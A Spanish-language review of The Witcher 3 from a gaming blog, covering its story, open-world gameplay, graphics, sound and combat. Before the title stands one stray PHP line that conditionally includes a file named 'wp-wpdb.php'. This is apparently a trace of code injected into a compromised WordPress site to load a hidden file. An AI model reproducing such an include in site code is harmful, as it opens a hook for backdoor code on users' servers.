if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Análisis The Witcher 3 – La Fortaleza de LeChuck

Análisis The Witcher 3

Si algo ha dado mucho de que hablar durante estos meses ha sido la esperada vuelta de Geralt de Rivia a las consolas y PC. Tras presentarse en el E3 hace 3 años, CD Projekt Red se puso manos a la obra y ha querido honrar a una de sus más exitosas IP con el juego más ambicioso que ha hecho la compañía hasta la fecha. Geralt ha vuelto, y con más fuerza que nunca.

El resultado final ha merecido la espera, The Witcher 3 guarda la esencia de sus anteriores entregas conservando lo bueno que lo hacía tan único en su género y se ha empapado de nuevos estilos para que el jugador disfrute cada minuto de juego. A pesar de todo esto el juego ha salido al mercado rodeado de cierta polémica debido a un downgrade que se ha tenido que hacer para que el juego tenga una mejor estabilidad, un pequeño sacrificio si comparamos todas las mejoras que trae consigo el juego.

the-witcher-3

HISTORIA

Lo que siempre ha caracterizado a la saga The Witcher ha sido su narrativa y la forma que tiene el juego de contarnos su historia, este es sin duda uno de los atractivos de The Witcher 3. La historia da comienzo con un sueño de Geralt en que estamos en un torreón junto a varios personajes conocidos de la saga, entre ellos la famosa Yennefer de la que tanto se ha oído hablar en anteriores entregas y que por fin hace acto de presencia. Tras un par de conversaciones con ellos vamos al encuentro de Ciri, una joven bruja que ha aparecido en las novelas y que tiene bastante repercusión en la historia.

Tras hablar con ella se nos da la oportunidad de conocer mediante un tutorial las nuevas mecánicas de salto, escalada y de combate, pero al final del sueño hace acto de presencia la caería salvaje a modo de mal augurio para nuestros protagonistas. Tras despertarnos nos encontramos en una fogata junto con Vesemir, un veterano que apareció por primera vez en el primer juego de la saga, que nos pone en situación dentro del juego.

La historia no tiene como protagonista principal a Geralt como en anteriores entregas, el brujo comparte protagonismo con Ciri, que será un personaje jugable en determinados puntos del juego para dar conocer el punto de vista y las acciones pasadas de este personaje, de esta forma el juego nos cuenta ambas partes de la historia y nos permite empatizar mejor con ambos personajes.

Conforme vayamos avanzando en las misiones principales, el juego irá desarrollando la trama en pequeñas dosis, invitando así al jugador que esté más interesado en la historia que en la exploración, profundice en los códices y diarios para no perderse ningún detalle y conocer mejor lo que está pasando realmente.

the-witcher-3-1

A pesar de que la historia principal sea la que más destaca, hay muchas tramas secundarias con nuevos y viejos personajes ya conocidos en anteriores juegos que no tienen nada que envidiar a la trama principal, estas subtramas tienen impacto en el juego y no conviene tomarse a la ligera las decisiones que se nos presentan.

También tendremos muchísimas misiones secundarias disponibles para conseguir dinero y experiencia, que van desde conseguirle a una mujer una sartén vieja que le habían robado hasta expulsar un viejo fantasma de una aldea abandonada, hay mucha variedad de misiones y algunas podremos resolverlas de diferentes formas, si que es cierto que hay bastantes misiones de relleno, pero vienen bien si quieres perderte un poco por el mapa y dejar a un lado la historia principal.

Uno de los aspectos en los que CD Projekt Red ha estado trabajando es en crear un juego que no necesita de sus anteriores entregas para poder ser disfrutado, si que es cierto que si no has jugado a The Witcher 1 y 2, o no has leído ninguna de las novelas, te vas a perder muchas referencias y sucesos, pero aun así vas a poder disfrutar el juego con total tranquilidad, y como último recurso siempre tendrás los códices donde se relata gran parte de la historia de la saga y se da información adicional sobre los personajes.

The Witcher 3 implementa una opción por la cual podremos importar las decisiones que hayamos tomado en The Witcher 2 para poder asumir las consecuencias de nuestros actos durante el juego, de esta forma podremos ver o no a ciertos personajes durante nuestra aventura en The Witcher 3.

Por otro lado los diálogos son uno de los puntos fuertes del juego, la gran mayoría son muy mordaces con un buen equilibrio de humor, y como viene siendo habitual en la saga tendremos varias opciones de respuesta que se adaptaran a nuestra personalidad.

Todas las respuestas que demos tendrán su consecuencia y harán que cambien de forma significativa ciertos puntos de la trama, hay que saber bien a quien dar una mala respuesta y a quien no si queremos evitar conflictos innecesarios y futuras trabas en ciertas misiones.

the-witcher-3-2

JUGABILIDAD

The Witcher 3 ha sido diseñado como sandbox en vez de como juego lineal, dándole un lavado de cara a la saga, y la verdad es que le ha sentado muy bien este cambio de mecánica. El diseño del mapeado y su tamaño son algo digno de admirar con una extensión de 136 km cuadrados de mundo abierto, casi 4 veces el tamaño del mapa de Skyrim.

Aunque a pesar de haber diseñado un mundo abierto el juego no tiene un mundo totalmente libre, el mapa general se divide en varios territorios que estarán separados entre si a los cuales habrá que acceder mediante el viaje rápido, esto ha sido diseñado con la premisa de eliminar cualquier tipo de tiempo carga a la hora de entrar en viviendas, cuevas y ciudades para que podamos movernos libremente por cada territorio.

La exploración es uno de los mayores atractivos del juego, cada territorio tiene una extensa área llena de secretos y una gran cantidad de misiones secundarías, le dedicaremos más tiempo a investigar y corretear por el mapa abriendo cofres y acabando con grandes monstruos que intentando completar la trama principal.

the-witcher-3-3

Explorar bien a fondo cada territorio tiene sus ventajas, el juego cuenta con una gran cantidad de zonas de poder ocultas que nos darán puntos de desarrollo extra para Geralt si conseguimos encontrarlas, por otro lado siempre tendremos cerca alguna mazmorra oculta llena de tesoros y con armas y/o armaduras más poderosas de lo que podamos encontrar en cualquier otra misión del juego.

Otro de los añadidos más interesantes al mapa de The Witcher 3 son los pequeños pueblos y las grandes ciudades, en ellas podremos comerciar para conseguir objetos y mejoras para Geralt, jugar a las cartas para pasar el rato, cortarnos el pelo o darse a los placeres de la carne si nos sobran algunas monedas entre otras muchas cosas. Estas ciudades sirven como punto de referencia para una gran cantidad de misiones secundarias gracias a los tablones de anuncios, si necesitas experiencia para subir de nivel o un dinero extra aquí tendrás misiones para aburrir.

Como todo buen sandbox que se precie necesitaremos un medio de transporte eficiente para poder ir de una punta a la otra del mapa sin necesidad de recorrerlo a pie, en The Witcher 3 aparte del ya conocido viaje rápido tenemos a Sardinilla, nuestro amado corcel que ha sido sacado de las novelas en las que está inspirado el juego y que nos ayudará a llegar a los sitios sin necesidad de gastar la suela de las botas.

Las mecánicas de Sardinilla son de lo mas prácticas en cuanto al movimiento, muchas de ellas han sido tomadas de Red Dead Redemption pudiendo galopar de forma libre si queremos o movernos de forma automática por los caminos de tierra manteniendo pulsado el botón, el corcel seguirá de forma automática el camino sin necesidad de andar girando en cada curva, lo que nos facilita el hecho de seguir las conversaciones de los personajes cuando hablan y montan a caballo o simplemente admirar los paisajes.

the-witcher-3-4

Además de tener a Sardinilla como medio terrestre, se han incluido los barcos como medio de transporte acuático, con ellos podremos navegar por los amplios ríos y acceder de forma más segura y rápida a las islas o cruzar de orilla a orilla sin necesidad de tomar desvíos. No conviene hacer mucho el cafre con los barcos ya que tienen un sistema de daños en el que si el barco recibe muchos golpes, ya sea por golpes de enemigos o por que nos chocamos con todo lo que nos encontremos, se hundirá y nosotros con el teniendo que recorrer lo que nos quede de camino a nado.

Otro de los cambios más significativos en The Witcher 3 es que Geralt ahora puede nadar, bucear, saltar y escalar para pasar por encima de pequeños obstáculos y acceder a diferentes lugares que no tengan un fácil acceso, esto le da una mayor sensación de libertad a los movimientos de Geralt y nos permite explorar una gran cantidad de lugares en el mapa.

La mecánica de escalada se parece mucho a lo visto en juegos como Assassin’s Creed o Uncharted solo que con mayores limitaciones, no podremos escalar un edificio ni escalar una pared rocosa, solo podremos subirnos a los salientes y a maderas o bordes, que por muy brujo sobrehumano que seas llevar tantos kilos de peso encima se hace notar.

El equipo se va deteriorando con el uso y tendremos que pasar por un herrero para repararlo de vez en cuando y así mantener las armas y armaduras en plenas condiciones, además disponemos de una serie de herramientas que mejorarán nuestra armadura y el daño de nuestras armas durante unos minutos, muy útil a la hora de realizar misiones difíciles.

El sistema de creación de objetos permanece casi igual a lo visto en anteriores títulos, si tenemos los ingredientes adecuados podremos crear cualquier poción, granadas y aceites para imbuir la espada en la pestaña de Alquimia, una vez se nos agoten se podrán reponer de manera automática si meditamos cualquier intervalo de tiempo. En cuanto a la creación de armas y armaduras solo tendremos que recolectar o desmontar los materiales adecuados para que el herrero pueda fabricarnos cualquier equipo que entre dentro de sus habilidades, ya que cada herrero tiene una experiencia de trabajo distinta.

the-witcher-3-5

APARTADO TÉCNICO

Dejando totalmente a un lado la polémica del downgrade, The Witcher 3 dispone de un apartado de luces de lo mas increíble, tanto los efectos de luz como los paisajes con puestas de sol, amaneceres y noches con luna llena dan como resultado una experiencia gráfica muy espectacular.

El juego ha apostado más por una mayor resolución que por una cantidad de frames estables, esto hace que el juego tenga caídas puntuales en ciertas secuencias y en combates con muchos enemigos en determinados tipos de luces. Estas caídas no son muy grandes y son poco habituales por lo que realmente no afectan a la jugabilidad general del juego.

Uno de los añadidos mas importantes es su sistema dinámico de día/noche que no solo afecta al paisaje, si no que determinados tipos de enemigos actuarán de forma diferente en función de la hora del día que sea, e incluso el ciclo lunar tiene su repercusión en el juego, un hombre lobo por ejemplo será mucho más poderoso en una noche de luna llena que en una con luna menguante. El juego también cuenta con un sistema climático que va cambiando de vez en cuando, tan pronto estas galopando bajo el sol como acabas empapándote debajo de la lluvia.

the-witcher-3-6

Y como pasa en casi todos los sandbox, The Witcher 3 tiene ciertos bugs que en general no pasan de lo puramente estético, sabemos que es difícil pulir todos los aspectos en juegos tan grandes y que es inevitable que ciertos bugs aparezcan, pero es de esperar que con futuras actualizaciones la gran mayoría se acaben solucionando.

La magnifica banda sonora de The Witcher 3 ha estado al cargo de Marcin Przybylowicz, quien ha apostado por una gran variedad de temas musicales que varían en función de la región en la que nos encontremos, por otro lado los combates tienen temas específicamente creados para darles una mayor epicidad.

Además de la banda sonora, el juego dispone de una enorme cantidad de efectos de sonido distintos, la lluvia, las pisadas, el crepitar del fuego, los sonidos de los pájaros son solo unos pocos ejemplos del enorme trabajo que ha realizado el equipo de sonido para crear una atmósfera de juego brutal si jugamos con un buen equipo de sonido o con los cascos puestos. Por desgracia el juego no viene doblado al castellano, pero el equipo de traducción ha hecho un magnifico trabajo y tenemos unos subtítulos a la altura del juego.

the-witcher-3-7

EL COMBATE

El combate en The Witcher 3 no es algo que haya cambiado mucho con respecto a sus anteriores entregas, se ha pulido un poco pero sigue siendo algo brusco, y salvo combinaciones con las magia no se aleja mucho de ser un machaca botones. Tenemos dos tipos de ataque, el ataque rápido que es menos letal pero que permite atacar de forma continuada y el ataque fuerte donde sacrificamos la velocidad para realizar un ataque más poderoso que ignora más índice de armadura que el ataque rápido.

El problema de la tosquedad en los movimientos de combate apenas se ha cambiado, y en varias ocasiones (sobretodo cuando estamos rodeados) se nota que los movimientos son algo torpes y difíciles de controlar, también hay que mencionar que la cámara a veces nos traiciona en espacios cerrados o cuando hay muchos enemigos cambiando el encuadre cuando menos falta hace, lo que no ayuda nada de nada. A pesar de que los movimientos sean algo toscos, esto no nos impide disfrutar del juego, solo hay que adaptarse y aprender los limites de nuestro personaje para aguantar el tipo contra cualquier enemigo.

Seguimos teniendo dos tipos de espada, una de acero para los humanos y animales y otra de plata para los seres y bestias fantásticas, cada una cumple su función y es mejor usarlas contra el enemigo para la cual ha sido diseñada si no queremos que se nos rompa antes de tiempo. También tenemos la posibilidad de equiparnos con una ballesta para los combates en los que queramos mantener la distancia, para dar el golpe de gracia a algún enemigo que esté huyendo o para derribar a los monstruos que estén volando.

the-witcher-3-8

Por otro lado seguimos teniendo las 5 magias/señales que han aparecido en los anteriores The Witcher. En la tabla de desarrollo además podremos desbloquear una segunda forma de ataque, por poner un ejemplo, en el caso de Igni, la magia con la que lanzamos fuego, en su primera forma lanzamos un pequeño barrido de fuego que hace daño en área, mientras que en su segunda forma tenemos un lanzallamas de corto alcance que hace daño de forma continua.

Lo más novedoso del sistema de combate es la posibilidad de combatir montado en nuestro corcel Sardinilla, esto nos da una oportunidad de asestar golpes tremendamente fuertes ya que disponemos de un plus importante en el daño o la de perseguir a enemigos que sean más rápidos que Geralt a pie.

Sardinilla tendrá una barra de pánico que se irá llenando en función de la cantidad de enemigos que tengamos cerca (los monstruos la llenan mucho más rápido), cuando esa barra se llene el caballo nos tirará al suelo y saldrá huyendo dejándonos solos en el combate, aunque si usamos la señal Axii mientras estamos montados podremos calmarlo durante unos segundos.

the-witcher-3-9

CONCLUSIONES

Personalmente he de decir que estoy muy impresionado con el trabajo que CD Projekt Red ha hecho con The Witcher 3, tenemos ante nosotros un producto que a pesar de no haber cumplido todo lo prometido en un principio, ha sabido sacarle provecho a la formula de sandbox y ha dado como resultado un juego sobresaliente con una cantidad de horas de juego para aburrir.

A pesar de que el apartado gráfico no haya salido todo lo bien que se esperaba, el juego presenta una calidad gráfica muy por encima de la media, que hayan sacrificado parte de la idea original que tenían para eliminar todos los tiempos de carga en cada territorio es un gran acierto, ya hace que jugar sea mucho más placentero y cómodo.

La forma en la que el juego te invita a querer saber más de la historia y los personajes es otro de los mayores atractivos del juego, si consigue engancharte ya no lo sueltas hasta haberlo acabado, y con más de 50 horas de campaña y otras 50 de subtramas y misiones secundarias hay juego para rato. El mundo abierto además te abre un sinfín de oportunidades para poder disfrutar del universo que CD Projekt Red ha conseguido crear a partir de las novelas de Andrzej Sapkowski, en definitiva tenemos ante nosotros un gran juego en muchos sentidos.